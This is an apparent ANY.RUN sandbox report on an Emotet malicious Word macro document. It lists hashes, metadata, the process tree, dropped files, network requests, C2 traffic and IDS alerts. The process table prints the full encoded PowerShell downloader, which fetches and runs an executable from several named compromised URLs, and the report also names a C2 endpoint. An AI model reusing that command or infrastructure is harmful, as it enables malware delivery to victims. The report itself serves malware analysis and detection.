analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Adjunto 18-09-2019_638769.doc

Full analysis: https://app.any.run/tasks/32b10eb8-36db-4e56-a272-ab9fbe726c66
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: September 19, 2019, 08:15:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
loader
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Road Valleys, Subject: Solutions, Author: Dannie Larson, Comments: Borders input Wisconsin, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 11:25:00 2019, Last Saved Time/Date: Wed Sep 18 11:25:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

5CAAB07BECCB0C5500A1C85059292817

SHA1:

0011075A8BA0669FF2121FE85B4919C8768162BB

SHA256:

4A914195A0FE3CED9590ABC67D5171AD425121C1774BD44B176EA02625ECC73A

SSDEEP:

6144:MJpm1VmTG3cBubZMHY6I2KDNTto08WQBqLkI47NSU4jJntATfDXcj1jVkAP:MJpm1VmTG3cBubZMHY6I2KDNTto08WQs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 553.exe (PID: 3704)
      • 553.exe (PID: 3592)
      • 553.exe (PID: 2540)
      • 553.exe (PID: 2288)
      • easywindow.exe (PID: 3868)
      • easywindow.exe (PID: 2896)
      • easywindow.exe (PID: 3652)
      • easywindow.exe (PID: 2976)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2480)

    • Emotet process was detected

      • 553.exe (PID: 2540)

    • EMOTET was detected

      • easywindow.exe (PID: 3652)

    • Connects to CnC server

      • easywindow.exe (PID: 3652)

    • Changes the autorun value in the registry

      • easywindow.exe (PID: 3652)

  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2480)

    • PowerShell script executed

      • powershell.exe (PID: 2480)

    • Creates files in the user directory

      • powershell.exe (PID: 2480)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2480)
      • 553.exe (PID: 2540)

    • Starts itself from another location

      • 553.exe (PID: 2540)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2748)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2748)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Road Valleys
Subject: Solutions
Author: Dannie Larson
Keywords: -
Comments: Borders input Wisconsin
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:18 10:25:00
ModifyDate: 2019:09:18 10:25:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Ruecker, Deckow and Schaefer
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Stamm
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 553.exe no specs 553.exe no specs 553.exe no specs #EMOTET 553.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs #EMOTET easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
2748"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Adjunto 18-09-2019_638769.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2480powershell -encod JABiAGsAYQB0AGEAdwBaAD0AJwBzAHcAaQBRAEsASgA1ACcAOwAkAGIAQgBNAGoAdgBaAG4AIAA9ACAAJwA1ADUAMwAnADsAJABrAGkASABSADMASQBiAD0AJwBWADQATwBCAEMARwBYACcAOwAkAEQASwBpAE8AWABiAGsAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgBCAE0AagB2AFoAbgArACcALgBlAHgAZQAnADsAJABYAEkAYgA5AG0AQQA2AD0AJwBOADMARABxAE0ASAAnADsAJABaAGMAdAB6AEUARgA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAEUAYgBjAGwAaQBlAE4AdAA7ACQAcgB3AEYAMABzAEMAQwB6AD0AJwBoAHQAdABwADoALwAvAGIAcgBpAGsAZQBlAC4AYwBvAG0ALwBnAGEAbABsAGUAcgB5AC8ANABkAGMAbQBuADcAMgA0ADMAMAAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZQBjAGgAZQBsAG8AbgBhAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdAB5AGgANQA3ADcANgA5AC8AQABoAHQAdABwADoALwAvAGcAcgB1AHAAbwBlAHEALgBjAG8AbQAvAGwAZQBkAHMALwBkAGEAbAA1ADIAMwAwADEALwBAAGgAdAB0AHAAOgAvAC8AawBpAHIAcwB0AGUAbgBiAGkAagBsAHMAbQBhAC4AYwBvAG0ALwBlAGMAcAA0AC8AbQBoAGgAMgAwADMAMAA1AC8AQABoAHQAdABwADoALwAvAHAAYQBpAGYAaQAuAG4AZQB0AC8AcwBzAGYAbQAvAGIAbQA4ADQAMAAvACcALgAiAFMAUABgAGwAaQBUACIAKAAnAEAAJwApADsAJAB1AGEAVABqAGsAMABMAD0AJwBrAG0AegBjAEsAegB3ACcAOwBmAG8AcgBlAGEAYwBoACgAJABqADAAbgBvAG8ATwBpACAAaQBuACAAJAByAHcARgAwAHMAQwBDAHoAKQB7AHQAcgB5AHsAJABaAGMAdAB6AEUARgAuACIAZABgAE8AYABXAE4AbABgAE8AQQBEAEYAaQBMAGUAIgAoACQAagAwAG4AbwBvAE8AaQAsACAAJABEAEsAaQBPAFgAYgBrAHcAKQA7ACQASQBJAHYAOABIAFgAPQAnAEoAdgBiAHUAcQBIADAAaQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0ACcAKwAnAGUAbQAnACkAIAAkAEQASwBpAE8AWABiAGsAdwApAC4AIgBMAGUAbgBgAEcAdABIACIAIAAtAGcAZQAgADIANAAwADQAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYQBgAFIAVAAiACgAJABEAEsAaQBPAFgAYgBrAHcAKQA7ACQARQA0AEoAUQBDAE0APQAnAGkAcwBGAEUAUABaACcAOwBiAHIAZQBhAGsAOwAkAHYAdQA5AFMANwBFAGwAdwA9ACcAaQBCAGYAegA2ADkAegAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABMAEEANABzAHUAegA9ACcATwBGAHEATABWAGsASgBEACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2288"C:\Users\admin\553.exe" C:\Users\admin\553.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3592"C:\Users\admin\553.exe" C:\Users\admin\553.exe553.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3704--12e39b71C:\Users\admin\553.exe553.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2540--12e39b71C:\Users\admin\553.exe
553.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3868"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe553.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2896"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2976--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3652--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 752
Read events
1 270
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
2748WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR89C6.tmp.cvr
MD5:
SHA256:
2748WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4859467.wmfwmf
MD5:FB641C8B39410211D488179F3625520A
SHA256:492C4DF31CEDB1A72F2DA8AEDD4A61C960D916D1E31F4D02880D684050833A42
2748WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:863FC9E97BDABBD5E0AD3A061D730927
SHA256:631E4424A221D05EF613531881AC807632D0C00DBC96D767F329D59B4C305051
2748WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\922FE742.wmfwmf
MD5:2C64CC7906851654BECC58E932B54067
SHA256:74D486DBCDDC7BDE3D579CB4563C60BE8FCBEB638AB2662B4DF5FF81A1656BC7
2748WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\596611A9.wmfwmf
MD5:6B232F06630C97465E6098E6E7EF91C2
SHA256:D4D5A703DF27A43AB2318A62EE2D4AE39D0283111997F963100C357B2CAC06D3
2748WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:88ABADDDE8B095C14C82DED4AA3E98A8
SHA256:8D5CB2D2FCDF98FFBB4137FECCCE676088224E7B460E9D2E430FB81EEF264873
2748WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AB765EB.wmfwmf
MD5:8D4EACF4722D45628723E6EEC52F1B69
SHA256:1BBFFA6476B54BE7129F3F0B2E1593D514307C640CCC060812F7291E031E6E22
2748WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$junto 18-09-2019_638769.docpgc
MD5:6199A21420910EED099FED24C1C07EF7
SHA256:487B153F3D3E01FAD65FB11D547A158F418C31DE8300F87E1CD54B365ED04358
2748WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BECBCA9F.wmfwmf
MD5:92C37AFF33750374D0613E7D359D7FDE
SHA256:9A2E2B0727CA22725A082F744D5CF05350D0940A26A8B251B3931F3A9184AA61
2748WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92E9DD12.wmfwmf
MD5:EA0C9997579D3523446A8D08E957E954
SHA256:3E269C34542807668CE5D957F60623C1C8C9FABFA4C101D2E32193F502AF532A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
4
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2480
powershell.exe
GET
404
185.57.197.56:80
http://grupoeq.com/leds/dal52301/
ES
html
273 b
suspicious
2480
powershell.exe
GET
200
83.137.145.97:80
http://kirstenbijlsma.com/ecp4/mhh20305/
NL
executable
376 Kb
suspicious
2480
powershell.exe
GET
302
129.121.15.236:80
http://brikee.com/gallery/4dcmn72430/
US
html
227 b
suspicious
3652
easywindow.exe
POST
200
114.79.134.129:443
http://114.79.134.129:443/between/loadan/ringin/
IN
binary
132 b
malicious
2480
powershell.exe
GET
200
129.121.15.236:80
http://brikee.com/cgi-sys/suspendedpage.cgi
US
html
7.12 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3652
easywindow.exe
114.79.134.129:443
D-Vois Broadband Pvt Ltd
IN
malicious
2480
powershell.exe
83.137.145.97:80
kirstenbijlsma.com
Duocast B.V.
NL
suspicious
2480
powershell.exe
129.121.15.236:80
brikee.com
Colo4, LLC
US
suspicious
2480
powershell.exe
185.57.197.56:80
grupoeq.com
Tecnocratica Centro de Datos, S.L.
ES
suspicious

DNS requests

Domain
IP
Reputation
brikee.com
  • 129.121.15.236
suspicious
www.echelona.net
unknown
grupoeq.com
  • 185.57.197.56
suspicious
kirstenbijlsma.com
  • 83.137.145.97
suspicious

Threats

PID
Process
Class
Message
2480
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2480
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2480
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3652
easywindow.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3652
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3652
easywindow.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Adjunto 18-09-2019_638769.doc